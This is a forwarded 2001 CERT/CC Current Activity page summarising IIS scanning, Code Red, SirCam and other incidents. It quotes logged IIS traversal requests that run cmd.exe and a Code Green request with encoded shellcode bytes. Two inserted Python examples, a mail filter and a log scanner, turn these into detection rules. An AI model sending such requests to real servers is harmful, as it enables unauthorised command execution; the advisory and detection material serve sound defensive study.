CERT/CC Current Activity
-----Original Message-----
From: Jeffrey Letourneau [mailto:[log in to unmask]]
Sent: Tuesday, September 18, 2001 12:50 PM
To: [log in to unmask]; [log in to unmask]
Subject: CERT-CC Current Activity.htm
--------------------------------------------------------------------------------
CERT/CC Current Activity
The CERT/CC Current Activity web page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities currently being reported to the CERT/CC.
Last Reviewed: Tue Sep 18 10:20:45 EDT 2001
Item (date added / last updated):
- Increase in Port 80 (HTTP) scanning activity (18 September 2001 / 18 September 2001)
- Computer virus alert hoax (13 September 2001 / 13 September 2001)
- W32/SirCam Malicious Code (23 July 2001 / 17 August 2001)
- Cache Corruption on Microsoft DNS Servers (31 August 2001 / 31 August 2001)
- "Code Red" Related Activity (2 August 2001 / 7 September 2001)
- Exploitation of a buffer overflow in telnetd (30 July 2001 / 17 August 2001)
- Scans and Probes (- / 17 August 2001)
--------------------------------------------------------------------------
Increase in Port 80 (HTTP) scanning activity
This morning (September 18th) the CERT/CC started receiving reports of a massive increase in scanning directed at port 80 (HTTP). Reports indicate that this scanning activity is attempting to exploit systems previously compromised by Code Red II and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT Vulnerability Note VU#111677 for information on the type of vulnerability being exploited.
The following is a log excerpt of this scanning activity:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
The CERT/CC has also received reports of a possibly new piece of malicious code named "readme.exe" being sent via email. Preliminary analysis indicates that this file may be related to the increase in port 80 scanning activity.
Sites are encouraged to verify the state of security patches on all IIS servers and email client software. Administrators may also want to add filters to mail servers to block the "readme.exe" attachment. In addition, sites may wish to notify users of the existence of "readme.exe" and its potential threat.
--------------------------------------------------------------------------
Computer virus alert hoax
The CERT/CC has received several reports of an email in circulation on the Internet claiming that we have made an announcement regarding a new wave of computer viruses following the attacks in New York and Washington. We have no evidence to support this statement and no such announcement has been made by the CERT/CC. At this time we have not seen any significant increase in security incidents.
Regardless of any specific threat, we continue to encourage users to exercise safe email practices including caution when handling email attachments.
The CERT/CC takes great care to make sure that the information we publish is accurate and verifiable. Similarly, we encourage all users to verify any statements that may be attributed to us. All announcements to the CERT Advisory mailing list are cryptographically signed for verification purposes. Any CERT announcements would also be published on our web site (most often on our Current Activity page).
--------------------------------------------------------------------------
W32/SirCam Virus
The CERT/CC continues to receive a large number of reports of a piece of malicious code known as W32/SirCam. W32/SirCam arrives in email with the following characteristics:
Subject: (same as the name of the attached file)
Body of English version:
(first line) Hi! How are you?
(last line) See you later. Thanks
Body of Spanish version:
(first line) Hola como estas?
(last line) Nos vemos pronto, gracias.
Attachment: A random filename with a double extension (like example.doc.bat)
Detailed information about W32/SirCam can be found in CERT Advisory CA-2001-22 or by visiting the sites listed on our Computer Virus Resources page. Users are strongly encouraged to visit their anti-virus vendor's website for information on how to properly remove W32/SirCam from an infected computer.
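The two mail-side recommendations on this page, filtering the "readme.exe" attachment named in the port 80 item and recognising the W32/SirCam traits listed just above (subject equal to the attachment name, a double-extension filename, and the quoted opening and closing body lines), can be expressed as one quarantine check. The following is an added example, not CERT/CC code: the messages are constructed with the standard library, the executable-extension list is an assumption to be extended per site, and accepting the subject with or without the attachment's final extension is a small generalisation of the text.

```python
import email
from email import policy
from email.message import EmailMessage
from typing import List, Optional

# Attachment name the CERT/CC text suggests filtering at the mail server.
BLOCKED_NAMES = {'readme.exe'}
# Assumption: executable suffixes worth flagging when they follow another extension.
EXECUTABLE_EXT = {'.exe', '.bat', '.com', '.pif', '.lnk', '.scr'}
# Opening and closing lines quoted in the W32/SirCam description above.
SIRCAM_OPENINGS = {'hi! how are you?', 'hola como estas?'}
SIRCAM_CLOSINGS = {'see you later. thanks', 'nos vemos pronto, gracias.'}


def double_extension(filename: str) -> bool:
    """True for names like example.doc.bat: an executable suffix after another one."""
    parts = filename.lower().rsplit('.', 2)
    return len(parts) == 3 and '.' + parts[-1] in EXECUTABLE_EXT


def body_lines(msg) -> List[str]:
    """Non-empty, stripped lines of the plain-text body (empty if there is none)."""
    part = msg.get_body(preferencelist=('plain',))
    text = part.get_content() if part is not None else ''
    return [line.strip() for line in text.splitlines() if line.strip()]


def inspect_message(raw: bytes) -> List[str]:
    """Return the reasons to quarantine a message; an empty list means no rule fired."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    subject = str(msg['subject'] or '').strip().lower()
    lines = body_lines(msg)
    reasons = []
    for part in msg.iter_attachments():
        name = part.get_filename()
        if not name:
            continue
        lower = name.lower()
        if lower in BLOCKED_NAMES:
            reasons.append(f'blocked attachment name: {name}')
        if double_extension(name):
            reasons.append(f'double extension: {name}')
        # SirCam trait: the subject is the attachment name (accepted with or without
        # its final extension) and the body opens and closes with the quoted lines.
        subject_matches = subject in (lower, lower.rsplit('.', 1)[0])
        if subject_matches and lines and lines[0].lower() in SIRCAM_OPENINGS \
                and lines[-1].lower() in SIRCAM_CLOSINGS:
            reasons.append(f'W32/SirCam characteristics: subject matches attachment {name}')
    return reasons


def build_message(subject: str, body: str, filename: Optional[str]) -> bytes:
    """Construct a test message (not a real sample); the attachment bytes are a placeholder."""
    msg = EmailMessage()
    msg['From'] = 'sender@example.org'
    msg['To'] = 'user@example.com'
    msg['Subject'] = subject
    msg.set_content(body)
    if filename:
        msg.add_attachment(b'constructed placeholder, not malware',
                           maintype='application', subtype='octet-stream',
                           filename=filename)
    return msg.as_bytes()


# Constructed messages exercising each rule.
SIRCAM_LIKE = build_message('example.doc.bat',
                            'Hi! How are you?\nPlease look at the attached file.\nSee you later. Thanks',
                            'example.doc.bat')
README_LIKE = build_message('Hello', 'Please see the attachment.', 'readme.exe')
BENIGN = build_message('Quarterly report', 'Attached is the report.', 'report.pdf')
NO_ATTACHMENT = build_message('Hi', 'Hi! How are you?\nSee you later. Thanks', None)

if __name__ == '__main__':
    for label, raw in [('sircam-like', SIRCAM_LIKE), ('readme.exe', README_LIKE),
                       ('benign', BENIGN), ('no attachment', NO_ATTACHMENT)]:
        print(label, '->', inspect_message(raw) or 'deliver')
```

The rules are deliberately independent: a bare "readme.exe" trips only the name rule, while a SirCam-style message trips the double-extension rule even when the body text has been altered, so a change to any one trait does not silence the whole filter.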
--------------------------------------------------------------------------
Cache Corruption on Microsoft DNS Servers
The CERT/CC has received reports from sites experiencing DNS cache corruption on systems running Microsoft DNS Server. The default configuration of this software allows for data from malicious or incorrectly configured DNS servers to be cached and supplied to client computers using that cache to resolve DNS information.
Please see:
- CERT Incident Note IN-2001-11
--------------------------------------------------------------------------
"Code Red" Related Activity
a. "Code Green" Worm
The CERT/CC has started receiving reports of a new worm known as "Code Green". The "Code Green" worm is designed to patch systems vulnerable to the "Code Red" worms and attempt to remove backdoors left by "Code Red II".
"Code Green" will leave the following signature in web server logs (the presence of this log entry does not necessarily indicate an infection):
"GET /default.ida?Code_Green_<I_like_the_colour-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_to_my_sisterli_'Doro'.Save_Whale_and_visit_<www.buhaboard.de>_and_<www.buha-security.de>%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
b. "Code Red II" Worm
The CERT/CC continues to receive reports of a worm commonly referred to as "Code Red II". The widespread, automated attack and propagation characteristics of "Code Red II" have caused bandwidth denial-of-service conditions in isolated portions of the Internet, particularly near groups of compromised hosts where "Code Red II" is running. Detailed information about the "Code Red II" worm can be found in:
- CERT Incident Note IN-2001-09
c. "Code Red" Worm
We also continue to receive reports of the original "Code Red" worm. Machines infected by this worm started scanning the Internet for vulnerable servers again on September 1st 2001.
Please see these documents for more information:
- A Very Real and Present Threat to the Internet: Resurgence in Code Red Scanning Activity
- CERT Advisory CA-2001-13
- CERT Advisory CA-2001-19
- CERT Advisory CA-2001-23
d. "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled
Along with the large number of "Code Red" and "Code Red II" reports indicating that systems are compromised, the CERT/CC has received a smaller yet still significant number of reports where Windows NT 4.0 IIS 4.0 systems have been adversely affected by the high volume of "Code Red" scanning activity. A recently discovered vulnerability can cause an IIS 4.0 server (patched against "Code Red" according to Microsoft Security Bulletin MS01-033) with URL redirection enabled to crash when scanned by the "Code Red" worms.
Please see:
- "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled
The CERT/CC is interested in receiving reports of "Code Red" activity. If machines under your administrative control are compromised, please send mail to [log in to unmask]
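The web-log excerpts on this page, the port 80 request strings under "Increase in Port 80 (HTTP) scanning activity" and the "Code Green" signature above, are worth matching on a decoded form of the request rather than on the raw text, because the cmd.exe variants differ only in how the path separator is encoded (%5c, %35c, and the \xc0\xaf, \xc1\x9c and \xc1\x1c byte pairs). The following is an added example, not CERT/CC code: it runs those signatures over constructed Apache-style log lines with TEST-NET addresses, and the lenient two-byte decoder is a simplifying assumption that reproduces how the byte pairs in the excerpt resolve to separators, not a model of any particular server.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample lines in Apache common log format with TEST-NET addresses;
# the request targets are copied from the CERT/CC excerpts above, with the \xHH
# sequences kept as literal text exactly as the excerpt prints them.
SAMPLE_LOG = r'''
192.0.2.10 - - [18/Sep/2001:10:21:03 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:03 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:04 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:04 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:05 -0400] "GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:05 -0400] "GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.10 - - [18/Sep/2001:10:21:06 -0400] "GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
198.51.100.7 - - [18/Sep/2001:10:25:41 -0400] "GET /default.ida?Code_Green_<I_like_the_colour-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_beta_written_by_'Der_HexXer'-Wuerzburg_Germany-_is_dedicated_to_my_sisterli_'Doro'.Save_Whale_and_visit_<www.buhaboard.de>_and_<www.buha-security.de>%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
203.0.113.5 - - [18/Sep/2001:10:30:00 -0400] "GET /index.html HTTP/1.0" 200 1234
'''

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')
HEX_ESCAPE = re.compile(rb'\\x([0-9a-fA-F]{2})')
PERCENT = re.compile(rb'%([0-9a-fA-F]{2})')


@dataclass
class Hit:
    family: str       # which signature matched
    raw: str          # request target as logged
    decoded: str      # canonical form used for matching
    obfuscated: bool  # True when decoding changed the target


def to_bytes(target: str) -> bytes:
    """Turn the excerpt's textual \\xHH escapes into the raw bytes they stand for."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), target.encode('latin-1'))


def percent_decode(data: bytes, rounds: int = 3) -> bytes:
    """Bounded repeated percent-decoding, so a double-encoded separator such as
    %%35c -> %5c -> backslash unwraps the way a server that decodes twice sees it."""
    for _ in range(rounds):
        new = PERCENT.sub(lambda m: bytes([int(m.group(1), 16)]), data)
        if new == data:
            break
        data = new
    return data


def lenient_utf8(data: bytes) -> bytes:
    """Assumption: a deliberately lenient two-byte decoder. Lead bytes C0/C1 can only
    encode code points below 0x80 (overlong ASCII) and any trailing byte is accepted,
    so C0 AF -> '/', C1 9C -> '\\' and C1 1C -> '\\' (the forms in the excerpt) all
    become the separators that a filter on the raw text never saw."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def normalize(target: str) -> str:
    """Decode as a lenient server would, then canonicalise separators and case."""
    decoded = lenient_utf8(percent_decode(to_bytes(target)))
    return decoded.decode('latin-1').replace('\\', '/').lower()


def classify(decoded: str) -> Optional[str]:
    """Map a decoded target to one of the signatures described on this page."""
    if 'root.exe' in decoded:  # cmd.exe copy left by a prior Code Red II / sadmind-IIS compromise
        return 'root.exe backdoor probe'
    if 'cmd.exe' in decoded:
        return 'cmd.exe probe'
    if decoded.startswith('/default.ida?code_green'):
        return 'Code Green worm signature'
    return None


def scan_log(text: str) -> List[Hit]:
    """Run the signatures over each log line and collect the hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            raw = m.group('target')
            decoded = normalize(raw)
            family = classify(decoded)
            if family:
                hits.append(Hit(family, raw, decoded, decoded != raw.lower()))
    return hits


def summarize(hits: List[Hit]) -> Dict[str, int]:
    return dict(Counter(h.family for h in hits))


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.family}{' (encoded)' if h.obfuscated else ''}: {h.decoded[:60]}")
    print(summarize(found))
```

The output makes the point of normalising first: the %5c, \xc1\x1c and \xc0\xaf requests all decode to the same /scripts/../../winnt/system32/cmd.exe target, so a single rule on the decoded path covers them, whereas matching the raw text would need one pattern per encoding and would still miss the next variant. As the page notes for the "Code Green" entry, a hit in the log shows that a request arrived, not that it succeeded; the response code is what tells the two apart.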
--------------------------------------------------------------------------
Exploitation of a buffer overflow in telnetd
The CERT/CC has received reports of exploitation of the buffer overflow in the telnetd program discussed in CERT Advisory CA-2001-21. This vulnerability can crash the telnetd server, or be leveraged to gain root access to the host. Sites are encouraged to read the advisory and take appropriate steps to protect any machines running the telnetd service.
The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to [log in to unmask]
--------------------------------------------------------------------------
Scans and Probes
We receive many daily reports of scanning and probing activity. The most frequent reports tend to involve services that have well-known vulnerabilities. Internet hosts continue to be affected by exploitation of well-known vulnerabilities in many of these services.
Service name (port/protocol), followed by related information:

ftp (21/tcp)
  IN-2001-01, Widespread Compromises via "ramen" Toolkit
  IN-2000-10, Widespread Exploitation of rpc.statd and wu-ftpd Vulnerabilities
  CA-2000-13, Two Input Validation Problems In FTPD
  AA-2000.02, wu-ftpd "site exec" Vulnerability
  CA-1999-13, Multiple Vulnerabilities in WU-FTPD
  CA-1997-27, FTP Bounce

ssh (22/tcp)
  CA-1999-15, Buffer Overflows in SSH Daemon and RSAREF2 Library

telnet (23/tcp)
  IN-2000-09, Systems Compromised Through a Vulnerability in the IRIX telnet daemon
  CA-2001-21, Buffer Overflow in telnetd

domain (53/tcp, 53/udp)
  CA-2001-02, Multiple Vulnerabilities in BIND
  CA-2000-20, Multiple Denial-of-Service Problems in ISC BIND
  IN-2000-04, Denial of Service Attacks using Nameservers
  CA-2000-03, Continuing Compromises of Nameservers
  CA-1999-14, Multiple Vulnerabilities in BIND
  CA-1998-05, Multiple Vulnerabilities in BIND

http (80/tcp)
  CA-2001-11, sadmind/IIS Worm
  CA-2001-23, Continued Threat of the "Code Red" Worm

"linuxconf" on some Linux distributions (98/tcp)
  Some Linux distributions ship with linuxconf, a program which listens on TCP port 98. While we do not have any reports of intruders actively exploiting vulnerabilities in linuxconf, these probes may be used to identify Linux machines that have other vulnerabilities.

pop2 (109/tcp)
  ipop2d buffer overflow

pop3 (110/tcp)
  Qpopper buffer overflow
  CA-1997-09, Vulnerability in IMAP and POP

sunrpc (111/tcp, 111/udp)
  CA-2001-05, Exploitation of snmpXdmid
  IN-2001-01, Widespread Compromises via "ramen" Toolkit
  IN-2000-10, Widespread Exploitation of rpc.statd and wu-ftpd Vulnerabilities
  CA-2000-17, Input Validation Problem in rpc.statd
  CA-1999-16, Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
  CA-1999-12, Buffer overflow in amd
  CA-1999-08, Buffer overflow in rpc.cmsd
  CA-1999-05, Vulnerability in statd exposes vulnerability in automountd
  CA-1998-12, Remotely Exploitable Buffer Overflow Vulnerability in mountd
  CA-1998-11, Vulnerability in ToolTalk RPC service
  CA-2001-11, sadmind/IIS Worm

netbios-ns (137/udp), netbios-dgm (138/udp), netbios-ssn (139/tcp)
  IN-2000-03, 911 Worm
  IN-2000-02, Exploitation of Unprotected Windows Networking Shares
  CA-2001-23, Continued Threat of the "Code Red" Worm

imap (143/tcp)
  CA-1998-09, Buffer Overflow in Some Implementations of IMAP Servers
  CA-1997-09, Vulnerability in IMAP and POP

printer (515/tcp)
  IN-2001-01, Widespread Compromises via "ramen" Toolkit
  Vulnerability Note VU#382365, LPRng can pass user-supplied input as a format string parameter to syslog() calls

klogind (543/tcp)
  CA-2000-06, Multiple Buffer Overflows in Kerberos Authenticated Services

socks (1080/tcp)
  VN-1998-03, WinGate IP Laundering

SGI objectserver (5135/tcp)
  20000303-01-PX, Vulnerability in IRIX 5.3 and 6.2 objectserver

SubSeven (27374/tcp)
  IN-2001-07, W32/Leaves: Exploitation of previously installed SubSeven Trojan Horses

ICMP echo (ICMP type 8), ICMP echo reply (ICMP type 0)
  CA-1998-01, "smurf" IP Denial-of-Service Attacks
--------------------------------------------------------------------------
For an overview of incident and vulnerability activity during the last quarter, see the most recent CERT Summary.
--------------------------------------------------------------------------
Copyright 1999, 2000, 2001 Carnegie Mellon University.
See the conditions for use, disclaimers, and copyright information.
CERT® and CERT Coordination Center® are registered in the U.S. Patent and Trademark office.